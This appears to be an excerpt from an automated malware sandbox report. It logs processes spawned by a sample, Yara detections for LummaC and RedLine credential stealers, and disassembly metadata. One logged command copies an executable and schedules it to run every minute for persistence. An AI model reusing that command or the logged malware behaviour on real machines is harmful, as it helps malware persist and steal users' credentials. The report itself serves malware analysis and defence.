Commandline:	"C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe" "C:\Users\user\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\user\Pictures\Lighter Tech\runtime.exe" /F
Imagebase:	0x7ff667bc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	11:13:53
Start date:	03/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	11:13:54
Start date:	03/09/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\user\Pictures\Lighter Tech\runtime.exe" /F
Imagebase:	0x7ff7247d0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	11:13:55
Start date:	03/09/2024
Path:	C:\Users\user\Pictures\Lighter Tech\runtime.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Pictures\Lighter Tech\runtime.exe"
Imagebase:	0x6d0000
File size:	45'056 bytes
MD5 hash:	B73CF29C0EA647C353E4771F0697C41F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 58%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	11:13:58
Start date:	03/09/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0x920000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000025.00000002.2578867327.0000000000591000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	11:13:58
Start date:	03/09/2024
Path:	C:\Users\user\1000238002\Amadeus.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\1000238002\Amadeus.exe"
Imagebase:	0xd00000
File size:	5'562'368 bytes
MD5 hash:	36A627B26FAE167E6009B4950FF15805
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000026.00000002.2732580728.00000000014EC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000026.00000002.2741849843.000000000160A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000026.00000002.2741849843.000000000160A000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	11:14:02
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe"
Imagebase:	0x400000
File size:	6'641'468 bytes
MD5 hash:	1F68ADC3E8D52FEF37E7E2DE22D0CD86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 51%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	11:14:06
Start date:	03/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe"
Imagebase:	0xdb0000
File size:	320'000 bytes
MD5 hash:	7E8C1E8B4C37553A6BC11083B18CEBDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000002.2703663881.00000000041C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 50%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	11:14:07
Start date:	03/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	11:14:07
Start date:	03/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x310000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	11:14:07
Start date:	03/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x820000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002B.00000002.2745709445.0000000000420000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	11:14:07
Start date:	03/09/2024
Path:	C:\Users\user\Pictures\Lighter Tech\runtime.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Pictures\Lighter Tech\runtime.exe"
Imagebase:	0x550000
File size:	45'056 bytes
MD5 hash:	B73CF29C0EA647C353E4771F0697C41F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	11:14:10
Start date:	03/09/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0x920000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 052201ED Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1503848084.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5220000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d92c44a65f5d5d2c50e22dabcf50743da4d76bacb84382a03972e52d35ce411
Instruction ID: 2c0fb8e916b09a6846156f42ce7016c7567ec7ba0a59e7d3a5128ed837dd3c80
Opcode Fuzzy Hash: 9d92c44a65f5d5d2c50e22dabcf50743da4d76bacb84382a03972e52d35ce411
Instruction Fuzzy Hash: 61F049EF5A8220BE6142C2816758AF6AB7EF9C77313308977F403C6502E2D45E0D6A31

Function 052201A9 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1503848084.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5220000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d6223a54fe90f7a4b817f655ac5b6061349d89072f53a141341946d79bf0c8a
Instruction ID: cb86002afe718c696b434a75f8d32c593c7b977e4c2daff85b521e028909d71a
Opcode Fuzzy Hash: 2d6223a54fe90f7a4b817f655ac5b6061349d89072f53a141341946d79bf0c8a
Instruction Fuzzy Hash: DC11A1FF5682357D6202D2852B18AFAAB6EE8C67303308567F802C7502D2C44E0D2531

Function 052201A2 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1503848084.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5220000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee632837961e64e6d2b41fa0493dcf65be5a5e4c6369e2f7a96368870bb09e00
Instruction ID: 0aef439fbfe22fccb741a2f944ff4bd2f4e76a0c66c0efcbe935bf9668856598
Opcode Fuzzy Hash: ee632837961e64e6d2b41fa0493dcf65be5a5e4c6369e2f7a96368870bb09e00
Instruction Fuzzy Hash: FD0180FF6682317D7142D2852B18AFAAB6EE9C67303308967F803C7502D2C44E0A6631

Function 052201AE Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1503848084.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5220000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fea8ecad745247eba9b4de46937e7b2f57b3f0b8e9ed057a48148d62f98b1c36
Instruction ID: 89fdff5b69159283bd34fb3d4993ffabafffcb898ec647c6a12ff718c871b0c3
Opcode Fuzzy Hash: fea8ecad745247eba9b4de46937e7b2f57b3f0b8e9ed057a48148d62f98b1c36
Instruction Fuzzy Hash: 5601ADEF6682317D6142D6856B18AFABB6EE9C67303308927F802C7402D6C44E0A6631

Function 052201CA Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1503848084.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5220000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ce248ee69e3d55343d2db8dae276af02ea947ac1de93764bac5c7d4b837c57c
Instruction ID: 2d2d5ac64b322fba9efcbd436502abe6bf14d8753fa9f60736750b1779d5099f
Opcode Fuzzy Hash: 9ce248ee69e3d55343d2db8dae276af02ea947ac1de93764bac5c7d4b837c57c
Instruction Fuzzy Hash: 0201F5FF2682217D6102D2816B18AFABB2EFDC67303308977F402C7402E7D44A0A5631

Function 05220242 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1503848084.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5220000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 044f1a0a2ab7e0e955218cbb33d1ebae1084d9a41e9c682486a95de73f8802ab
Instruction ID: dfc2d029a5a65c405071649c22fb17740fd990575bf4ce37dce9b301d863b5cb
Opcode Fuzzy Hash: 044f1a0a2ab7e0e955218cbb33d1ebae1084d9a41e9c682486a95de73f8802ab
Instruction Fuzzy Hash: 7A01D4AF5682307E6102D285271CAFABB6EFDC77713308927F403CB502D2D45A0A2671

Function 05220205 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1503848084.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5220000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1399cf3894a8744aadd429345895cf266136842dd01ca698c5cc53f02527bb9b
Instruction ID: 96ebea87c2991e27e57e9dc6a912248eb671216066225185dc23b7cf3c4483a0
Opcode Fuzzy Hash: 1399cf3894a8744aadd429345895cf266136842dd01ca698c5cc53f02527bb9b
Instruction Fuzzy Hash: 9701D4EF56D2613DA24386512A2C9F6BF6AFCC6A30330866BF402C6542E1D50A4E5A31

Function 0522021D Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1503848084.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5220000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848367ad54ad93bbf31711bdb5f4b5176fbd39a45e858544d61dd2e6c4f1f5a9
Instruction ID: df07bd5980e9fcb35bf8d822d4f426527799241c0daf2f96a648b4cb0701fcf2
Opcode Fuzzy Hash: 848367ad54ad93bbf31711bdb5f4b5176fbd39a45e858544d61dd2e6c4f1f5a9
Instruction Fuzzy Hash: 56F062EF1681217DE64385912A1DAF66B7EF9C7735335853BF403C6902E2C50A4E5631

Analysis Process: axplong.exePID: 3212, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	10.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.2%
Total number of Nodes:	1921
Total number of Limit Nodes:	119

Executed Functions

Function 001BE440 Relevance: 14.6, Strings: 11, Instructions: 878
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WWp=, xrefs: 001C04DA
#, xrefs: 001C0534
111, xrefs: 001BF6B0
WGt=, xrefs: 001BF62D, 001BF90A
UD==, xrefs: 001BEA1F, 001BEC66
MT==, xrefs: 001BE4A5
GqKudSO2, xrefs: 001BE47F
246122658369, xrefs: 001BF647, 001BF924, 001C04F7
fed3aa, xrefs: 001BFA9E
MJB+, xrefs: 001BE734
d4!, xrefs: 001BF6D5

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$d4!$fed3aa
API String ID: 0-553852504
Opcode ID: b8cf3170e1e307382ecd02c9586adff4346250fe7792e17b9163fd334e2cbcea
Instruction ID: b956acc70c94c3b50d6c661fac9463c792bfb0277615ed16a1b106e444666e1a
Opcode Fuzzy Hash: b8cf3170e1e307382ecd02c9586adff4346250fe7792e17b9163fd334e2cbcea
Instruction Fuzzy Hash: 95721570904248DBEF14EF68C959BDDBFB6AB66304F50819CE805673C2C7759A88CBD2

Function 001CD312 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 001B247E

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 6a645af78575f7f6541ec3748d149019ef031320ad4c1e19180607eca14a3594
Instruction ID: 908918640ad5cc478695b544013d4a718c0a10f424e1cad87437cb8cd23838a6
Opcode Fuzzy Hash: 6a645af78575f7f6541ec3748d149019ef031320ad4c1e19180607eca14a3594
Instruction Fuzzy Hash: B1517AB1D00615CBDB15CF99E885BAAB7F1FB68310F24857AD405EB294DB74D940CF90

Function 001C3550 Relevance: 53.3, APIs: 1, Strings: 29, Instructions: 761
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 001C425F

Part of subcall function 001C7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 001C795C
Part of subcall function 001C7870: __Cnd_destroy_in_situ.LIBCPMT ref: 001C7968
Part of subcall function 001C7870: __Mtx_destroy_in_situ.LIBCPMT ref: 001C7971

Strings

WJP6, xrefs: 001C53A3
5120, xrefs: 001C3ABF, 001C3BAA
Fz==, xrefs: 001C369E, 001C4D2D
W07l, xrefs: 001C3AEE
96B6, xrefs: 001C5470
JB6, xrefs: 001C53F5
Vp 6, xrefs: 001C5447
9526, xrefs: 001C531D
HBhr, xrefs: 001C378F
V5Qk, xrefs: 001C3DC0
MJF+, xrefs: 001C47BD, 001C48EC, 001C4ADC, 001C4C0B
stoi argument out of range, xrefs: 001C2E02, 001C4269, 001C4EAC
fed3aa, xrefs: 001C5489
MJB+, xrefs: 001C4776, 001C47ED, 001C4A95, 001C4B0C
V0x6, xrefs: 001C541E
KFT0PL==, xrefs: 001C54B9
6F9fr==, xrefs: 001C4712
V0N6, xrefs: 001C537A
9KN6, xrefs: 001C5351
aqB6, xrefs: 001C54DB
8ZF6, xrefs: 001C5502
WJms, xrefs: 001C3BD9
invalid stoi argument, xrefs: 001C2DE9, 001C2DF8, 001C425A, 001C4E9D
", xrefs: 001C3E99
-!, xrefs: 001C4F3A
mP=, xrefs: 001C6383
5F6, xrefs: 001C5497
246122658369, xrefs: 001C1EA5, 001C27EE, 001C2A43, 001C2AB0, 001C2E88, 001C3373, 001C33D4, 001C4F4D, 001C4F8F, 001C4F99, 001C54F4
aZT6, xrefs: 001C53CC

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$"$246122658369$5120$8ZF6$9526$96B6$9KN6$Fz==$HBhr$KFT0PL==$MJB+$MJF+$V0N6$V0x6$V5Qk$Vp 6$W07l$WJP6$WJms$aZT6$aqB6$fed3aa$invalid stoi argument$stoi argument out of range$-!
API String ID: 4234742559-3802694314
Opcode ID: 23d7bb700975e13db43a902d1c99b28c5ca69ca37f1e62376052ac876a83475a
Instruction ID: d1212b3759f71c60a345ef49f972fac7c2442b9b4826b20e1a40aa99a72e5461
Opcode Fuzzy Hash: 23d7bb700975e13db43a902d1c99b28c5ca69ca37f1e62376052ac876a83475a
Instruction Fuzzy Hash: C6521570A002489BDF18EF78CC5AB9DBB75AF66300F54819CF445A72C2D775DA84CBA2

Function 001C2E20 Relevance: 29.3, APIs: 1, Strings: 15, Instructions: 1325COMMON

Download Yara Rule

APIs

Part of subcall function 001C7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 001C795C
Part of subcall function 001C7870: __Cnd_destroy_in_situ.LIBCPMT ref: 001C7968
Part of subcall function 001C7870: __Mtx_destroy_in_situ.LIBCPMT ref: 001C7971

std::_Xinvalid_argument.LIBCPMT ref: 001C425F

Strings

8KG0fCKZFzY=, xrefs: 001C2F64
5120, xrefs: 001C3ABF, 001C3BAA
WWt=, xrefs: 001C1E88, 001C2A26, 001C2E6E
Fz==, xrefs: 001C369E
WJms, xrefs: 001C3BD9
W07l, xrefs: 001C3AEE
HBhr, xrefs: 001C378F
WWp=, xrefs: 001C2A93, 001C3359
V5Qk, xrefs: 001C3DC0
invalid stoi argument, xrefs: 001C2DE9, 001C2DF8, 001C425A
", xrefs: 001C3E99
8KG0fymoFx==, xrefs: 001C2EC7, 001C3136
WGt=, xrefs: 001C27D1, 001C33BA
stoi argument out of range, xrefs: 001C2E02, 001C4269
246122658369, xrefs: 001C1EA5, 001C27EE, 001C2A43, 001C2AB0, 001C2E88, 001C3373, 001C33D4

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: "$246122658369$5120$8KG0fCKZFzY=$8KG0fymoFx==$Fz==$HBhr$V5Qk$W07l$WGt=$WJms$WWp=$WWt=$invalid stoi argument$stoi argument out of range
API String ID: 4234742559-2030321068
Opcode ID: e53bbbc3755fce69113696b5d15297bcb2e2294f861c5873effaac0fbecaf627
Instruction ID: 9c96fe7a75dcd8a45e3ab959ed74f19524663fc4087a59d2dd3133e11fa65c0f
Opcode Fuzzy Hash: e53bbbc3755fce69113696b5d15297bcb2e2294f861c5873effaac0fbecaf627
Instruction Fuzzy Hash: 5EB22370A002489BEF18EF68CC5ABEDBBB1AF65304F54815CF415A72C2D775DA84CB92

Function 001ED4F4 Relevance: 1.7, APIs: 1, Instructions: 198
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d8e9208f971a4ffb647857019185e73e8ebe68b8f3c0a65e63a3aa72e9f246f
Instruction ID: fbd2363ff3ad769446199aaafa5afa5e18af348e81aa4b8ab6f8e56f4c71a5da
Opcode Fuzzy Hash: 2d8e9208f971a4ffb647857019185e73e8ebe68b8f3c0a65e63a3aa72e9f246f
Instruction Fuzzy Hash: 3D61F672D00A948FDF25DF6AF8857EDB7B1EF69314F254115E849AB290D7319C008B51

Function 001E6E01 Relevance: 1.6, APIs: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__dosmaperr.LIBCMT ref: 001E6F12

Part of subcall function 001E7177: __dosmaperr.LIBCMT ref: 001E71AC

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
